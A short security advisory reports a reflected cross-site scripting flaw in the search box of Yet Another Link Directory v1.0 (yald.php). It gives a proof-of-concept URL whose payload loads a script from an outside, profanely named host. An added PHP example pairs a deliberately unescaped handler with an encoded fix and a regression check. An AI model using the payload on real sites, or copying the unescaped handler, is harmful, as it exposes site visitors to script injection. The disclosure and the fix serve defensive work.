
Yet Another Link Directory v1.0






Yet Another Link Directory v1.0
http://yald.sourceforge.net/ 

Affected files:
yald.php

---------------------------
yald.php search box XSS

User input isn't sanitized before being written into the generated page. In the search box for a PoC put:
 

url:
http://example.com/yald.php?search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E 

- Luny
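
The pattern this advisory describes, as an added PHP example that is not yald.php's own code: a hypothetical search handler that writes the `search` parameter into the page unescaped, beside a version that encodes it for HTML at output time. The function names and markup are assumptions; the query string is the one from the PoC URL above.

```php
<?php
// Added example: hypothetical handlers, not code from yald.php.

// Vulnerable pattern: the search term goes into the HTML unescaped,
// so markup in the parameter becomes markup in the response.
function render_search_vulnerable(array $query): string
{
    $term = $query['search'] ?? '';
    return '<p>Results for: ' . $term . "</p>\n"
         . '<input type="text" name="search" value="' . $term . '">';
}

// Encode for the HTML context at output time. ENT_QUOTES also covers
// the quoted value="" attribute; ENT_SUBSTITUTE replaces invalid UTF-8.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_search_hardened(array $query): string
{
    $term = $query['search'] ?? '';
    if (!is_string($term)) {   // ?search[]=x arrives as an array
        $term = '';
    }
    return '<p>Results for: ' . h($term) . "</p>\n"
         . '<input type="text" name="search" value="' . h($term) . '">';
}

// Query string copied from the PoC URL in the advisory.
parse_str(
    'search=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E%3C%2FSCRIPT%3E',
    $query
);

$bad  = render_search_vulnerable($query);
$good = render_search_hardened($query);

// Regression check: the raw tag survives only in the vulnerable output.
var_dump(stripos($bad, '<script') !== false);
var_dump(stripos($good, '<script') !== false);
echo $good, "\n";
```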
